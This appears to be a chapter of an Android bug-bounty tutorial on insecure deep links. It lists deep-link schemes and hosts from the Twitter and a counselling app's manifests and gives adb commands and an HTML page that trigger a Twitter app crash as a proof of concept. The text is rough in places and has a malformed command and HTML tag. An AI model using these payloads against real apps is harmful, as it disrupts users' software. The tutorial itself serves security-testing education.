7. Deep Link

Methods to find a bug

Steps :

1. Deep Link like CSRF Vulnerability
2. search for scheme and host in manifest file
3. Exploit using ADB

<data android:scheme="http" android:host="www.faithfulcounseling.com"/>
<data android:scheme="https" android:host="www.faithfulcounseling.com"/>
<data android:scheme="betterhelpapp" android:host="betterhelp"/>

Example :-
<data android:scheme="https" android:host="www.faithfulcounseling.com"/>

https://www.faithfulcounseling.com

betterhelpapp://betterhelp

am start -n android.intent.action.VIEW -d "betterhelpapp://betterhelp"

PoC 1

twiter deeplink

am start -n android.intent.action.VIEW -d "twitter://intent/retweet"


 <data android:scheme="otpauth"/>
<data android:scheme="https"/>
<data android:scheme="http"/>


<data android:scheme="http"/>
               <data android:scheme="https"/>
               <data android:host="twitter.com"/>
               <data android:host="www.twitter.com"/>
               <data android:host="mobile.twitter.com"/>
               <data android:pathPattern="/.*"/>


               <data android:scheme="https"/>
                               <data android:host="ads.twitter.com"/>
                               <data android:pathPrefix="/mobile"/>

                               <data android:scheme="https"/>
                                              <data android:host="twitter.app.link"/>
                                              <data android:host="twitter-alternate.app.link"/>
                                              <data android:host="twitter.test-app.link"/>
                                              <data android:host="twitter-alternate.test-app.link"/>
                                              <data android:scheme="twitter"/>
                                                              <data android:host="account"/>
                                                              <data android:host="tweet_previews"/>
                                                              <data android:host="bouncer"/>
                                                              <data android:host="connect_people"/>
                                                              <data android:host="explore"/>
                                                              <data android:host="follow"/>
                                                              <data android:host="follower_requests"/>
                                                              <data android:host="front"/>
                                                              <data android:host="interest_picker"/>
                                                              <data android:host="list"/>
                                                              <data android:host="lists"/>
                                                              <data android:host="login"/>
                                                              <data android:host="login-token"/>
                                                              <data android:host="mentions"/>
                                                              <data android:host="messages"/>
                                                              <data android:host="moment"/>
                                                              <data android:host="moments"/>
                                                              <data android:host="news"/>
                                                              <data android:host="photo"/>
                                                              <data android:host="post"/>
                                                              <data android:host="quote"/>
                                                              <data android:host="search"/>
                                                              <data android:host="search-home"/>
                                                              <data android:host="settings"/>
                                                              <data android:host="signup"/>
                                                              <data android:host="spaces"/>
                                                              <data android:host="status"/>
                                                              <data android:host="timeline"/>
                                                              <data android:host="trends"/>
                                                              <data android:host="tweet"/>
                                                              <data android:host="topics"/>
                                                              <data android:host="unfollow"/>
                                                              <data android:host="user"/>
                                                              <data android:host="golive"/>
                                                              <data android:host="camera"/>
                                                              <data android:host="switch_to_logged_in_account"/>
                                                              <data android:host="teams_invitation"/>
                                                              <data android:host="broadcasts"/>
                                                              <data android:host="collection"/>
                                                              <data android:host="onboarding"/>
                                                              <data android:host="canon"/>
                                                              <data android:host="fleets"/>
                                                              <data android:host="followed_topics"/>
                                                              <data android:host="qr_follow"/>
                                                              <data android:host="open"/>
                                                              <data android:host="login_challenge_redirect"/>

                                                              <data android:scheme="twitter"/>
                                                                              <data android:host="twtr.sng.link"/>
                                                                              <data android:pathPattern="/.*"/>

<data android:scheme="twitter"/>
  <data android:host="hashtag"/>
  <data android:host="internal"/>
  <data android:pathPattern="/.*"/>

  <data android:scheme="twitter"/>
                 <data android:host="flow"/>
                 <data android:pathPrefix="/setup_profile"/>

PoC 2

Bug Name :- Insecure DeepLinks allow to crash twitter Android app

Steps to Reproduce :-
1) open adb shell
2) run am start -a android.intent.action.VIEW -d "twitter://intent/retweet"
3) exploit via browser using html

see i cant go back

to go back we have to use home button

now its normal

now its now working


when application running on background if user trigger deep link application crash after home button its going normal stage

but if user not using twitter  while user trigger deep link its completely crashing

Exploit code:-

<!DOCTYPE html>
<html lang="en" dir="ltr">
  <head>
    <meta charset="utf-8">
    <title></title>
  </head>
  <body>

    <a href="twitter://intent/favorite"><h1>Insecure Deep link</<h1></a>


  </body>
</html>

we dont need malware to exploit this bug
thankyou for watching this video

Impact :-

Application crash

Previous6. Exported Activity Next8. Insecure DB Storage

Last updated 1 year ago